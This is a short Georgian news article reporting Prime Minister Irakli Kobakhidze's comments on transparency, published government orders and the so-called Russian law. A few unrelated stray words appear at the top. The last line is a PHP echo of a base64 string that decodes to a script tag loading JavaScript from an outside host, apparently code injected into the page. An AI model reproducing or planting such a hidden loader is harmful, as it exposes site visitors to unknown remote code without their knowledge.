celsiusi
ავერსი შნაიდერი

 პრემიერ-მინისტრმა ირაკლი კობახიძე ამბობს, რომ გამჭვირვალობა არავის უხარია და მათ შორის, მთავრობასაც ექმნება უხერხულობა განკარგულებების გამოქვეყნებით. ამის შესახებ პრემიერმა მთავრობის ადმინისტრაციაში გამართულ პრესკონფერენციაზე, ე.წ. რუსულ კანონზე დასმული კითხვის საპასუხოდ განაცხადა.

“რა თქმა უნდა, როდესაც ფულს ხარჯავს, არავის არ უხარია გამჭვირვალობა. მაგალითად, ჩვენ მივიღეთ ჩვენი ინიციატივით მთავრობაში ეს გადაწყვეტილება, მაგრამ ჩვენც გვქონდა გაცნობიერებული, რომ გამჭვირვალობას მოსდევს რისკები. მაგალითად, როდესაც მივიღე გადაწყვეტილება იმასთან დაკავშირებით, რომ ყველა განკარგულება უნდა გასაჯაროებულიყო, ერთ კვირაში, ერთ-ერთმა ტელევიზიამ, მართალია უსაფუძვლოდ, მაგრამ ააგორა სპეკულაციური კამპანია ერთ-ერთ განკარგულებასთან დაკავშირებით. ანუ უხერხულობას ჩვენც გვიქმნის ეს, მიუხედავად იმისა, რომ ყველაფერს სუფთად ვაკეთებთ. დონორს შეიძლება არ უხარია მისი თანხების გამჭვირვალობა, მაგრამ ჩვენ ხომ ჩვენი ინტერესები გვაქვს“,- ამბობს კობახიძე.

შეგახსენებთ, რომ მთავრობამ განკარგულებების გამოქვეყნება 2020 წელს შეწყვიტა, იმის მიუხედავად, რომ რეგლამენტი მთავრობის ადმინისტრაციას პირდაპირ ავალდებულებს, მთავრობის მიერ მიღებული განკარგულებები, გარდა სახელმწიფო საიდუმლოებას მიკუთვნებული საკითხებისა, მიღებიდან არა უგვიანეს 3 დღისა, ვებგვერდზე ატვირთოს. განკარგულებების გამოქვეყნება წელს განახლდა, მთავრობამ განკარგულებების გამოქვეყნების პირობა მიმდინარე წლის თებერვალში დადო. 

167
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");